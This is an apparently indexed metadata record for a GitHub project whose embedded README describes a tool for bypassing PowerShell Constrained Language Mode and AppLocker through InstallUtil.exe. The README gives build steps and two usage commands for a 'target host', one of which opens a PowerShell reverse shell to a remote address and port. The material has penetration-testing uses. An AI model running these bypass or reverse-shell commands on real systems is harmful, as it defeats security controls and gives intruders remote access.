{"id":13638307,"url":"https://github.com/padovah4ck/PSByPassCLM","last_synced_at":"2025-04-19T17:33:38.012Z","repository":{"id":45791629,"uuid":"148599184","full_name":"padovah4ck/PSByPassCLM","owner":"padovah4ck","description":"Bypass for PowerShell Constrained Language Mode","archived":false,"fork":false,"pushed_at":"2021-12-23T16:29:01.000Z","size":2203,"stargazers_count":373,"open_issues_count":3,"forks_count":51,"subscribers_count":6,"default_branch":"master","last_synced_at":"2024-11-09T08:39:18.005Z","etag":null,"topics":["bypass","c-sharp","constraint-language","installutil","powershell","powershell-language-mode"],"latest_commit_sha":null,"homepage":null,"language":"C#","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/padovah4ck.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null}},"created_at":"2018-09-13T07:27:18.000Z","updated_at":"2024-11-07T10:02:23.000Z","dependencies_parsed_at":"2022-07-17T00:16:29.446Z","dependency_job_id":null,"html_url":"https://github.com/padovah4ck/PSByPassCLM","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/padovah4ck%2FPSByPassCLM","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/padovah4ck%2FPSByPassCLM/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/padovah4ck%2FPSByPassCLM/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/padovah4ck%2FPSByPassCLM/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/padovah4ck","download_url":"https://codeload.github.com/padovah4ck/PSByPassCLM/tar.gz/refs/heads/master","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":249750184,"owners_count":21320089,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["bypass","c-sharp","constraint-language","installutil","powershell","powershell-language-mode"],"created_at":"2024-08-02T01:00:43.863Z","updated_at":"2025-04-19T17:33:36.861Z","avatar_url":"https://github.com/padovah4ck.png","language":"C#","funding_links":["https://www.buymeacoffee.com/padovah4ck"],"categories":["Operating Systems","C# #"],"sub_categories":["Windows"],"readme":"# PSByPassCLM\nBypass for PowerShell Constrained Language Mode\n\n## Description and references \nThis technique might come in handy wherever or whenever you're stuck in a low privilege PS console  \nand PowerShell Version 2 engine is not available to perform a [PowerShell Downgrade Attacks](http://www.leeholmes.com/blog/2017/03/17/detecting-and-preventing-powershell-downgrade-attacks/).\n\nWhat described above may happen in [modern] Windows OSes (like Windows 10, Windows Server 2016..),  \nthat nowdays are shipped out with AppLocker and PowerShell Version 5 (v5).\n\nWith AppLocker in Allow mode and PowerShell running in Constrained Mode, it is not possible for an attacker  \nto change the PowerShell language mode to full in order to run attack tools.  \nImho, not beeing able to use core language functionalities (eg, load script in memory and so on..) it's a such a pain.\n\n\"PowerShell v5 detects when AppLocker Allow mode is in effect and sets the PowerShell language to Constrained Mode,  \nseverely limiting the attack surface on the system.  \nWith AppLocker in Allow mode and PowerShell running in Constrained Mode, it is not possible for an attacker  \nto change the PowerShell language mode to full in order to run attack tools.\" [[Source]](https://adsecurity.org/?p=2604)\n \n## Build the binary\nThe project is written in C#. All the source (few lines of codes though) is committed: .csproj, .sln ...  \nIDE - Visual Studio 2015. You should be able to easily compile and build the binary with the default configuration Debug/X64.\nYou only may to fix the System.Management.Automation reference that is located in the GAC folder \n```dos\nC:\\Windows\\Microsoft.NET\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll\n```\n\n## Usage\nWell, nothing new here as we're going to use the old and well-known trick of \"InstallUtil.exe\" to bypass AppLocker.\nOnce you've compiled the binary, issue the below command on the target host.  \nBesides, your binary doesn't have to be an \"exe\" as InstallUtil.exe parse any file type (.txt, .bin....)\n\nThis one opens a subshell in the current console\n```bash\nC:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\InstallUtil.exe /logfile= /LogToConsole=true /U c:\\temp\\psby.exe\n```\n\nThis one tries to open a PS reverse shell (I've bound it into the source as a life saver :-) ..)\n```bash\nC:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\InstallUtil.exe /logfile= /LogToConsole=true /revshell=true /rhost=10.10.13.206 /rport=443 /U c:\\temp\\psby.exe\n```\n\n## Testing\nTested on the following environment  (Windows Server 2016)\n![Screenshot](img/clm01.JPG?raw=true)\n\n![Screenshot](img/clm02.JPG?raw=true)\n\nPS process in current console\n![Screenshot](img/clm03.JPG?raw=true)\n\nTrying to open PS reverse shell\n![Screenshot](img/clm04.JPG?raw=true)\n\nGot the shell\n![Screenshot](img/clm05.JPG?raw=true)\n\n\n## Useful Links\nhttps://blogs.msdn.microsoft.com/powershell/2017/11/02/powershell-constrained-language-mode/  \nhttps://adsecurity.org/?p=2604  \nhttps://pentestn00b.wordpress.com/2017/03/20/simple-bypass-for-powershell-constrained-language-mode/  \nhttps://blog.stealthbits.com/how-attackers-are-bypassing-powershell-protections/  \nhttps://decoder.cloud/2017/11/17/we-dont-need-powershell-exe-part-3/  \n\n\n## Author\nThis code is developed by Chris D. [@padovah4ck](https://twitter.com/padovah4ck) // [LinkedIn](https://www.linkedin.com/in/chrisdanieli/) //   \nUse it at your own risk. No responsability on my side\n\n\n---\n\n![Beer](https://icons.iconarchive.com/icons/flat-icons.com/flat/48/Beer-icon.png)  [Buy me a beer if you like ;-)](https://www.buymeacoffee.com/padovah4ck)\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fpadovah4ck%2FPSByPassCLM","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fpadovah4ck%2FPSByPassCLM","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fpadovah4ck%2FPSByPassCLM/lists"}